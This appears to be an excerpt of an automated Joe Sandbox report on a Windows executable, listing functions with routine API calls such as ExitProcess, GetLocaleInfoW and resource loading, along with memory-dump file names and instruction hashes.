                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 6ba20291a97b8dffbd88e1a324447bfb2ea3625d065f492f94a9b38716cde4dd
                                                                  • Instruction ID: 69af0123669756491cbcc399246483ade6b4597816c4a2b2c55db5fb4c36c7ab
                                                                  • Opcode Fuzzy Hash: 6ba20291a97b8dffbd88e1a324447bfb2ea3625d065f492f94a9b38716cde4dd
                                                                  • Instruction Fuzzy Hash: 77F059B28085049BF3108B10DC8D3BB7739FB80316F2482BFD80AA65C0E77D29C69912
                                                                  Function 0040C682 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 12f118fbb239615395ea9538c912c5d4c94e8fbe4be552a81dfd1e0ce1bb7abf
                                                                  • Instruction ID: 976f40e0c262d17d240ba049857bcc2b0c58b231ea4c786d867e3f99c7e49c76
                                                                  • Opcode Fuzzy Hash: 12f118fbb239615395ea9538c912c5d4c94e8fbe4be552a81dfd1e0ce1bb7abf
                                                                  • Instruction Fuzzy Hash: 5DF0E9E3D045445AF7500924DC0DBAB6A3CDBC0715F0441BAE80D655C0E77C1AC5C922
                                                                  Function 0040C380 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 4e20d53ad8376365945ab3ebb2b9f12874dcb86e56057a73c68a7eb45c99a3e5
                                                                  • Instruction ID: 472463df7dc7515533e30ab1ad5dc97b63a568be39cababd7865ec33f77735c5
                                                                  • Opcode Fuzzy Hash: 4e20d53ad8376365945ab3ebb2b9f12874dcb86e56057a73c68a7eb45c99a3e5
                                                                  • Instruction Fuzzy Hash: 16F037E2C041049AF7504A14EC4A7BB752CEB80715F14457BD80EA41C0F77D6ECA9967
                                                                  Function 0040C2FA Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 4d946ee84461f20e6611a4a5294b83d1cab5594b581638b572cb52ed8f63f044
                                                                  • Instruction ID: 41a703e8c68eb43c2289ed5718c4f48593ca50147ebefd7b8766e2d57271407b
                                                                  • Opcode Fuzzy Hash: 4d946ee84461f20e6611a4a5294b83d1cab5594b581638b572cb52ed8f63f044
                                                                  • Instruction Fuzzy Hash: 58F0E5E28081049FF7204A10DC897FB7A3CFB80725F2481BBE80E615C0E77D1AC68922
                                                                  Function 0040C38B Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 4606904282755ca6b8a52a491e8596f29001fa7158d1d60903295552d60ef76f
                                                                  • Instruction ID: 4fe0fe7e6e9e45ac4036d5c7278f99ec0fab1bb6b7f95b03918df05c6d1b342b
                                                                  • Opcode Fuzzy Hash: 4606904282755ca6b8a52a491e8596f29001fa7158d1d60903295552d60ef76f
                                                                  • Instruction Fuzzy Hash: 76F092E28041049BF7604A50DC4A7EB763CEB80716F1485BBD80EE45C0EBBD5EC68D27
                                                                  Function 0040CCE5 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: fcde7fd86c028c5d188d605d8a5c099e2c5c6e521ec3781deed5696f3d057b19
                                                                  • Instruction ID: 9bd1436980abe9389dca7793adfc9160e5d73a85d6ff86bdb935e657276dcbe0
                                                                  • Opcode Fuzzy Hash: fcde7fd86c028c5d188d605d8a5c099e2c5c6e521ec3781deed5696f3d057b19
                                                                  • Instruction Fuzzy Hash: 91D0A73194C18486F7911754CCB038EBF655F51745F1400FBC44DB51C1937A8F9B8507
                                                                  Function 0040D7B0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: fe224db4e1f4a368c28716439e4f7066e8414b30992a0ba0c97ca23ecbf60f4e
                                                                  • Instruction ID: b12b89855ee4e669c3cbf46eb01707d99eeecf86db04606955205a1fa3747863
                                                                  • Opcode Fuzzy Hash: fe224db4e1f4a368c28716439e4f7066e8414b30992a0ba0c97ca23ecbf60f4e
                                                                  • Instruction Fuzzy Hash: 5BC04C36B443288BDBE49A45E8457E8F739EB84733F1001EAD90D912409F711DD4CE51
                                                                  Function 0040CCF8 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 3c3db34eb7781049176df19a5cc694f90a3ea73ed2e26338aa25eb99a13a7ad6
                                                                  • Instruction ID: b6882c12cff54bfd9b859dee453dfe4b0a3268a62ad0403b98f454c0e73de424
                                                                  • Opcode Fuzzy Hash: 3c3db34eb7781049176df19a5cc694f90a3ea73ed2e26338aa25eb99a13a7ad6
                                                                  • Instruction Fuzzy Hash: FCC08C30A0C20842EB9117A1C848388BA795F90B01F000096C0082108087B646C58B01

                                                                  Non-executed Functions

                                                                  Function 0040EC80 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 159COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000800,00000009,00000010,00000008), ref: 0040ED0A
                                                                  • _swscanf.LIBCMT ref: 0040ED30
                                                                  Strings
                                                                  • L+C, xrefs: 0040ED89
                                                                  • H+C, xrefs: 0040EE66
                                                                  • Unknown current OS language. (defaulting to English), xrefs: 0040EE59
                                                                  • `+C, xrefs: 0040EDC0
                                                                  • d+C, xrefs: 0040EDB6
                                                                  • Got Current OS Language (primaryLangID: %d subLangID: %d) which translates to EAD language %s, xrefs: 0040EE75
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale_swscanf
                                                                  • String ID: Got Current OS Language (primaryLangID: %d subLangID: %d) which translates to EAD language %s$H+C$L+C$Unknown current OS language. (defaulting to English)$`+C$d+C
                                                                  • API String ID: 4240319459-3027554918
                                                                  • Opcode ID: 8f6a36c9de7199f1bdbe89a798b914ed15667ce0543bdb7c782b75dfd403bd5a
                                                                  • Instruction ID: fdad99bada8757720c833c82a8f7d6c6cf6eab86f3ecb27813d772bb7b7b4850
                                                                  • Opcode Fuzzy Hash: 8f6a36c9de7199f1bdbe89a798b914ed15667ce0543bdb7c782b75dfd403bd5a
                                                                  • Instruction Fuzzy Hash: B351B831604919C7D7209E6ED98066AF364EB48754F20893BF412E73C1D77DAD1687CE
                                                                  Function 00401020 Relevance: 4.5, APIs: 3, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadResource.KERNEL32(?,?,?,?,?,0042D770), ref: 0040102B
                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,?,0042D770), ref: 0040103A
                                                                  • SizeofResource.KERNEL32(?,?,?,?,?,?,?,0042D770), ref: 0040104B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$LoadLockSizeof
                                                                  • String ID:
                                                                  • API String ID: 2853612939-0
                                                                  • Opcode ID: 2f20284f3294e2baed1ee4f9c24c77794bdb686d89e5afd298025a070179dce0
                                                                  • Instruction ID: 3c230f17593eedadb8d1a25c334522914d9658cf97881ecee832d9e389989f04
                                                                  • Opcode Fuzzy Hash: 2f20284f3294e2baed1ee4f9c24c77794bdb686d89e5afd298025a070179dce0
                                                                  • Instruction Fuzzy Hash: EAF0963370012957CB306B79EC049BBB7DCDA917A63008577F989F76A0E539DCC582A8
